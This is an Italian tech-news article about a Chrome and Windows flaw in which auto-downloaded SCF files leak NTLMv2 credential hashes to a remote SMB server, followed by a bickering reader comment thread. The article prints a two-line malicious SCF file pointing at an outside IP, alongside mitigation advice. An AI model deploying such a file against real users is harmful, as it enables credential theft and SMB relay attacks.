Di MAro Ilaria

Chrome, un bug per rubare credenziali Windows

Il famoso browser di Google contiene un bug che se sfruttato potrebbe consentire agli hacker di rubare le credenziali di autenticazione della vittima e lanciare attacchi di tipo SMB Relay

Roma - Gli attacchi che coinvolgono il protocollo SMB su Windows sono un problema costante e gli exploit finora conosciuti sono innumerevoli. Recentemente un security engineerdi DefenseCode, Bosko Stakanovic ha scoperto una vulnerabilità dovuta alla configurazione di default di Google Chrome e al comportamento di Windows 10 nel trattamento dei file SCF.

chromebug

Con questa configurazione di default il browser scarica automaticamente i file che ritiene sicuri senza interrogare l'utente sulla locazione in cui verrà effettuato il download, ma usando la cartella presente di default.

L'estensione SCF (Windows Explorer Shell Command) è utilizzata dai tempi di Windows 98 per creare dei file speciali con icona personalizzata in grado di richiamare funzionalità di sistema, come ad esempio il collegamento "Mostra Desktop".
Come spiegato da Stakanovich una volta che l'utente viene portato a cliccare su un link malevolo questo innesca un download automatico di un file di tipo SCF, che induce Windows ad effettuare un tentativo di autenticazione a un server SMB remoto. Il file malevolo può contenere anche solo due righe, come nell'esempio seguente:

[Shell]
IconFile=\\170.170.170.170\icon

L'SCF, una volta scaricato, rimane dormiente finché la vittima non apre la cartella "Download", dopodiché, senza bisogno che l'utente clicchi sul file scaricato Windows, tenterà automaticamente di raggiungere "l'icona" specificata, presentando le sue credenziali al server remoto.
Ciò fornisce all'attaccante l'username della vittima e l'hash NTLMv2 delle password, che potranno essere utilizzati offline per il cracking o per accedere direttamente ad altri servizi che accettano lo stesso tipo di autenticazione.

Stakanovich sostiene che questo attacco può essere usato anche per perpetrare attacchi di tipo SMB relay: le organizzazioni che permettono accesso remoto a servizi come Microsoft Exchange e usano NTLM come metodo di autenticazione potrebbero essere vulnerabili, permettendo all'hacker di accedere ai dati senza dover rompere la password.

Questi tipi di attacchi permettono a utenti malevoli di impersonare altri soggetti, perciò sono un problema anche per le grandi aziende; le credenziali rubate possono essere utilizzate in tempi successivi al loro furto per eseguire privilege escalation al fine di prendere il controllo delle risorse IT.
Per gli utenti di Windows 8/10 che usano un account Microsoft, invece che l'account locale, avranno impatto anche su tutti i servizi Microsoft collegati (Outlook.com, Office360 ecc.).

Al momento, Chrome sta lavorando a un fix. Nel frattempo, per proteggersi dagli impatti della vulnerabilità, si raccomanda di disabilitare il salvataggio automatico dei file in Chrome andando nel menu Impostazioni/Mostra impostazioni avanzate e selezionando l'opzione Richiedi dove salvare ogni file prima di scaricare.
Inoltre, è consigliabile limitare il traffico SMB alle reti private, configurando il firewall di modo da bloccare le porte 137, 138, 139 e 445 verso la rete Internet.

Ilaria Di Maro

fonte immagine
Notizie collegate
  • SicurezzaMicrosoft, patch per tuttoGli aggiornamenti di sicurezza di Redmond arrivano inesorabili con il secondo martedì del mese, portando in dote fix per pericolose vulnerabilità su IE, Edge, Windows e tutto quanto. Aggiornano pure Adobe e Cisco, perché la CIA è sempre in agguato
  • TecnologiaGoogle, tra realtà virtuale e videogameNuova acquisizione per Google che si porta a casa Owlchemy Labs, azienda specializzata in realtà virtuale e videogiochi. La sfida ai concorrenti non è più solo sul visore hardware, ma anche sul software
  • SicurezzaWannaCry, analisi tecnica del ransomwareSono più di 20 le versioni diffuse e svariate le realtà infettate in oltre 100 nazioni. Ecco il flusso di esecuzione di WannaCry, il cryptomalware che sta tenendo sotto scacco gli utenti Windows e i media di tutto il mondo
  • AttualitàNet Neutrality, se ne parli pubblicamenteDopo il voto della FCC si apre la discussione pubblica sulla proposta di smantellamento della Neutralità della Rete
38 Commenti alla Notizia Chrome, un bug per rubare credenziali Windows
Ordina
  • Buongiorno a tutti,
    ho letto le vostre varie risposte dove, come me, pensate insensato questo indice puntato su Chrome... qualsiasi browser potrebbe scaricare questo tipo di file, ma anche un exe potrebbe avere al suo interno un riferimento a tale link.... Per non aggiungere che su molti router seri il firewall blocca già le porte SMB di default verso l'esterno (d'altra parte a che servirebbero?)
    Non capisco perchè i vari browser non contengano al loro interno un semplice elenco di files da bloccare in download... mah.... a volte ho l'impressione che alcuni bachi vogliono che esistano... no?
  • quindi la colpa è di chrome...
    ovviamente allora sono buggati
    telnet
    wget
    curl
    ftp
    e qualunque altro f*ttuto programma che scarica dati dalla rete e li salva con un nome su disco...
    non+autenticato
  • - Scritto da: mementomori
    > quindi la colpa è di chrome...
    > ovviamente allora sono buggati
    > telnet
    > wget
    > curl
    > ftp
    > e qualunque altro f*ttuto programma che scarica
    > dati dalla rete e li salva con un nome su
    > disco...

    """
    inoltre, è consigliabile limitare il traffico SMB alle reti private, configurando il firewall di modo da bloccare le porte 137, 138, 139 e 445 verso la rete Internet.
    """

    no ma dai.... che consigli sono questi!!! aspettiamo il fix di google e lasciamo smb raggiungibile da qualunque ip sul pianeta.
    non+autenticato
  • - Scritto da: mementomori
    > - Scritto da: mementomori
    > > quindi la colpa è di chrome...
    > > ovviamente allora sono buggati
    > > telnet
    > > wget
    > > curl
    > > ftp
    > > e qualunque altro f*ttuto programma che scarica
    > > dati dalla rete e li salva con un nome su
    > > disco...
    >
    > """
    > inoltre, è consigliabile limitare il traffico SMB
    > alle reti private, configurando il firewall di
    > modo da bloccare le porte 137, 138, 139 e 445
    > verso la rete
    > Internet.
    > """
    >

    La cosa VERGOGNOSA e' che nel 2017 ci siano ancora in giro sistemi operativi che hanno quelle porte aperte di default.

    E' cosi' difficile da capire che un sistema deve avere di default tutto chiuso e poi l'utente apre solo quello che gli serve, quando gli serve?
  • Dove sono finiti tutti quelli che dicevano che bastava passare a windows 10 per essere sicuri ?
    Rotola dal ridereRotola dal ridereRotola dal ridereRotola dal ridereRotola dal ridere
    non+autenticato
  • - Scritto da: panda rossa
    > La cosa VERGOGNOSA e' che nel 2017 ci siano
    > ancora in giro sistemi operativi che hanno quelle
    > porte aperte di
    > default.

    nella mia lista delle cose vergognose ci sono anche (tra le altre)

    * email in html
    * MUA che impongono quoting accazzo
    * email con allegati word/excel/etc...
    * nessun sistema di repository applicazioni / driver
    * estensioni file nascoste
    * explorer (non internet explorer)
    * internet explorer
    * risorse del pc figlio di desktop in esplora risorse
    * lettere di unità
    * registro di sistema
    non+autenticato
  • - Scritto da: panda rossa

    > La cosa VERGOGNOSA e' che nel 2017 ci siano
    > ancora in giro sistemi operativi che hanno quelle
    > porte aperte di
    > default.

    E' da un po' che Windows non ha quelle porte aperte di default.
    non+autenticato
  • Scusate: non ero loggato.
  • - Scritto da: Zucca Vuota
    > Scusate: non ero loggato.

    Per scrivere la tua marketta pro windows, potevi anche farne a meno. Loggarti intendo.Sorride
    non+autenticato
  • - Scritto da: Il Fuddaro

    > Per scrivere la tua marketta pro windows, potevi
    > anche farne a meno. Loggarti intendo.
    >Sorride

    Almeno le mie marchette non dicono falsità o non trasudano ignoranza su Windows.
  • - Scritto da: panda rossa
    > - Scritto da: mementomori
    > > - Scritto da: mementomori
    > > > quindi la colpa è di chrome...
    > > > ovviamente allora sono buggati
    > > > telnet
    > > > wget
    > > > curl
    > > > ftp
    > > > e qualunque altro f*ttuto programma che
    > scarica
    > > > dati dalla rete e li salva con un nome
    > su
    > > > disco...
    > >
    > > """
    > > inoltre, è consigliabile limitare il
    > traffico
    > SMB
    > > alle reti private, configurando il firewall
    > di
    > > modo da bloccare le porte 137, 138, 139 e 445
    > > verso la rete
    > > Internet.
    > > """
    > >
    >
    > La cosa VERGOGNOSA e' che nel 2017 ci siano
    > ancora in giro sistemi operativi che hanno quelle
    > porte aperte di
    > default.
    >
    > E' cosi' difficile da capire che un sistema deve
    > avere di default tutto chiuso e poi l'utente apre
    > solo quello che gli serve, quando gli
    > serve?

    Si ma quando l'nsa ha ordinato di rimanere quelle porte aperte, a espressamente richiesto che fosse per sempre!
    non+autenticato
  • - Scritto da: Il Fuddaro

    > Si ma quando l'nsa ha ordinato di rimanere quelle
    > porte aperte, a espressamente richiesto che fosse
    > per
    > sempre!

    Peccato che quelle porte di default siano chiuse.
  • Ed ecco a voi un'altra porcheria made in Redmond.

    Una inutile funzionalita' che rientra a pieno diritto nella categoria "fronzoli", presente SINCE WINDOWS '98, e' in grado di compromettere il sistema operativo.
  • ... in compenso hanno strombazzato ai 4 venti il fatto di avere inibito per la sicurezza il DRM dei programmi terzi solo per spingere l'aggiornamento dei vecchi programmi programmi ... paghi qualcosa in più ma in compenso hanno lasciato la loro melma ...
    non+autenticato
  • - Scritto da: panda rossa
    > Ed ecco a voi un'altra porcheria made in Redmond.
    >

    anche Linux è affetto tramite il protocollo SAMBA. Tiè!
    non+autenticato
  • - Scritto da: gennaro_Ga
    > - Scritto da: panda rossa
    > > Ed ecco a voi un'altra porcheria made in
    > Redmond.
    > >
    >
    > anche Linux è affetto tramite il protocollo
    > SAMBA.
    > Tiè!
    cioe' sotto linux fai girare Explorer? forte come sadismo...
    non+autenticato
  • - Scritto da: bubba
    > - Scritto da: gennaro_Ga
    > > - Scritto da: panda rossa
    > > > Ed ecco a voi un'altra porcheria made in
    > > Redmond.
    > > >
    > >
    > > anche Linux è affetto tramite il protocollo
    > > SAMBA.
    > > Tiè!
    > cioe' sotto linux fai girare Explorer? forte come
    > sadismo...

    Che pretendi da uno che di nome fa Gennaro.
    non+autenticato
  • perche' linux usa i file scf ?
    non+autenticato
  • Bravo, gran bella figura di merda !!!
    non+autenticato
  • - Scritto da: panda rossa
    > Ed ecco a voi un'altra porcheria made in Redmond.

    Si parla anche di un baco di Chrome.

    > Una inutile funzionalita' che rientra a pieno
    > diritto nella categoria "fronzoli", presente
    > SINCE WINDOWS '98,

    "il browser scarica automaticamente i file che ritiene sicuri senza interrogare l'utente sulla locazione in cui verrà effettuato il download"

    E stiamo parlando di Chrome, il browser di Google.

    > e' in grado di compromettere
    > il sistema
    > operativo.

    Il sistema operativo non viene compromesso, vengono intercettate le credenziali utente, che se sono criptate devono essere decriptate da chi le acquisisce, se vogliono essere utilizzate.

    Leggiamoli gli articoli una volta ogni tanto.
    non+autenticato
  • > Il sistema operativo non viene compromesso,
    > vengono intercettate le credenziali utente, che
    > se sono criptate devono essere decriptate da chi
    > le acquisisce, se vogliono essere
    > utilizzate.
    >
    > Leggiamoli gli articoli una volta ogni tanto.
    hahahahahahahahahaha meno male che ci sono persone come te che leggono attentamente ma sorpattutto comprendono gli articoli, grazie di salvarci dall'ignoranza!
  • - Scritto da: fabpolli
    > > Il sistema operativo non viene compromesso,
    > > vengono intercettate le credenziali utente, che
    > > se sono criptate devono essere decriptate da chi
    > > le acquisisce, se vogliono essere
    > > utilizzate.
    > >
    > > Leggiamoli gli articoli una volta ogni tanto.
    > hahahahahahahahahaha meno male che ci sono
    > persone come te che leggono attentamente ma
    > sorpattutto comprendono gli articoli, grazie di
    > salvarci
    > dall'ignoranza!

    Thò guarda !! Un pollo che sa leggere gli articoli e capisce bene l'italiano ma soprattutto è il massimo esperto di sicurezza informatica del suo pollaio Rotola dal ridere
    Vediamo se questo pollo sa spiegare la differenza tra: "sistema operativo compromesso" e "acquisizione delle credenziali". Sono la stessa cosa ? A bocca aperta
    Forse è meglio che ritorni nell'aia a pigolare A bocca aperta
    non+autenticato
  • > Thò guarda !! Un pollo che sa leggere gli
    > articoli e capisce bene l'italiano ma soprattutto
    > è il massimo esperto di sicurezza informatica del
    > suo pollaio
    > Rotola dal ridere
    > Vediamo se questo pollo sa spiegare la differenza
    > tra: "sistema operativo compromesso" e
    > "acquisizione delle credenziali". Sono la stessa
    > cosa ?
    >A bocca aperta
    > Forse è meglio che ritorni nell'aia a pigolare A bocca aperta
    L'SCF, una volta scaricato, rimane dormiente finché la vittima non apre la cartella "Download", dopodiché, senza bisogno che l'utente clicchi sul file scaricato Windows, tenterà automaticamente di raggiungere "l'icona" specificata, presentando le sue credenziali al server remoto

    Cosa non ti è chiaro che fin che non apri la cartella download o tenti di cliccare sul file le credenziali non vengono richieste?